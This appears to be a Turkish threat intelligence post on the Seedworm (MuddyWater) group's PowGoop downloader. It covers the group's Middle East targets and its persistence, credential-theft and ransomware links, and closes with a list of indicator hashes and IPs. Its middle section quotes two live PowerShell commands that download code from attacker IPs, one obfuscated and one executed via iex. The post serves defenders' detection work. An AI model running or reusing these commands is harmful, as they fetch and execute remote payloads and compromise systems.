İran merkezli Seedworm (bilinen adıyla Muddywater) isimli grubun Orta Doğu’da yer alan kurumlara gerçekleştirdiği siber atakların sayısında son zamanlarda ciddi bir artış meydana gelmiştir. Hedef alınan ülkeler arasında Irak, İsrail, Kuveyt, Birleşik Arap Emirlikleri ve Türkiye’nin de yer aldığı bilinmektedir. Sektörel olarak ise telekom ve bilişim servisleri hedef olarak alınmıştır.
Saldırılarılarda kullanılan aracın adı, PowGoop (Dowloader.Covic) olarak tespit edilmiştir. “Scheduled Task” tarafından çalıştırılan bir powershell yardımıyla “SecurityHealthCore” isimli RegistryKey içindeki kod çalıştırılmaktadır. Bu kod ile “Backdoor.Mori” isimli arka kapı oluşturulmaktadır. Kullanılan araçlar sayesinde local ve remote portların konfigürasyonu yapılmatadır. Bu sayede enfekte olan sistemler arasında dosya transferlerinin yolu açılmaktadır. Credential çalmak amaçlı olarak “Quarks PwDump” kullanıldığı görülmüştür. Remote kod çalıştırılması için kullanılan Remadmin aracı son saldırılarda tespit edilmiştir. Bu aracın da dosyaları decode edip okumak amaçlı Powershell çalıştırdığı bilinmektedir. Örnek komutlar aşağıdaki gibidir:
- powershell -exec bypass $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$AaA = “Do”;$AaB = ” wnloadStr”;$AaC = “ing”;$s=”$AaA$AaB$AaC”(‘http://23.95.220.166:80/download.php?k=564’);$s;”
- $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;start-sleep 10;$s=$V.DownloadString(‘http://104.168.44.16:443/H6qy8yvXhV69mF8CgpmWwKb1oV19xMqaI’);iex($s)
PowGoop’un son dönemde gündeme gelen Thanos Ransomware ile bağlantısı olduğu ortaya çıkmıştır. Bu aracın son dönemde Türkiye, Azerbaycan, Afganistan, İsrail, Gürcistan gibi ülkelere yapılan siber saldırılarda kullanıldığı ve hükumet, teknoloji, telekom, petrol ve doğalgaz kurumlarını hedef aldığı görülmüştür.
IoC Listesi
Tespit edilen IoC değerleri aşağıdaki gibidir:
| MD5 | VT Score | File Type |
| 2e7b4ae4baa704588248b425b8e027bf | 9/60 | Powershell |
| c938b18056ec17ac00bf0083844eafd8 | 49/71 | Win32 EXE |
| b07d9eca8af870722939fd87e928e603 | 36/71 | Win32 EXE |
| 2c3d8366b6ed1aa5f1710d88b3adb77d | 20/60 | Powershell |
| ee2d1e570be5d53a5c970339991e2fd7 | 18/59 | Text |
| 2e7b4ae4baa704588248b425b8e027bf | 9/58 | Powershell |
| 01160fd8afe8f133b7a95755ead39679 | 34/61 | GZIP |
| 2534e46be860170f2237c65749af4435 | 40/63 | ZIP |
| fbe65cd962fc97192d95c40402eee594 | 38/62 | Win32 DLL |
| 5c000ef1e5c6f50cc32c6d70837bd1b2 | 7/60 | VBA |
| 2e6169253a87a9d67037b1a238d46365 | 40/61 | MS Excel Spreadsheet |
| bbe9bb47f8dd8ba97250bf7f13187ab6 | 7/60 | VBA |
| dbadc2caee829baf5531703f6741a9d3 | 47/68 | Win32 EXE |
| 1d6f241798818e6fdc03015d01e1e680 | 52/70 | Win32 DLL |
| 7c12a63096a6b157564dc912e62b2773 | 44/67 | Win32 DLL |
| 6983f7001de10f4d19fc2d794c3eb534 | 52/71 | Win32 EXE |
| 08f933c423a281153811c278a34248ef | 42/71 | Win32 EXE |
URL/IP
- hxxp://107.173.141[.]114:443/downloadc.php?key=[REDACTED]
- hxxp://107.173.141[.]103:443/downloadc.php?key=[REDACTED]
- hxxp://104.168.44[.]16:443/H6qy8yvXhV69mF8CgpmWwKb1oV19xMqaI’
- hxxp://23.95.220[.]166:80/download.php?k=564′
- hxxp://107.175.0[.]140:443
- 107.173.141[.]114
- 185.183.96[.]11
- 185.141.27[.]156
- 23.95.220[.]166
- 107.175.0[.]140
- 104.168.14[.]116
- 107.173.181[.]139
- 104.168.44[.]16
- 192.210.214[.]83
- 107.173.141[.]103
